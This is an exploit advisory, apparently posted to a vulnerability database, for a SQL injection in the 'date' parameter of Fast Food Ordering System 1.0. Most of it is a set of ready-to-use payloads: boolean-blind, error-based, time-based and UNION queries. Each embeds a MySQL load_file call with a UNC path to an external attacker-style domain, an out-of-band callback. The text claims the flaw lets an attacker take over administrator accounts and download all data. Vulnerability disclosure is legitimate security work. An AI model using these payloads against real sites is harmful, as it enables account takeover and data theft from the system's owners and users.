Headline
Fast Food Ordering System 1.0 SQL Injection
Fast Food Ordering System version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Fast Food Ordering System 1.0 SQLi## Author: nu11secur1ty## Date: 05.30.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering## Description:The date parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'was submitted in the date parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: date (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''OR NOT 9209=9209 AND 'OBPK'='OBPK Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT(ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''UNION ALL SELECTNULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering)## Proof and Exploit:[href](https://streamable.com/kkyrgk)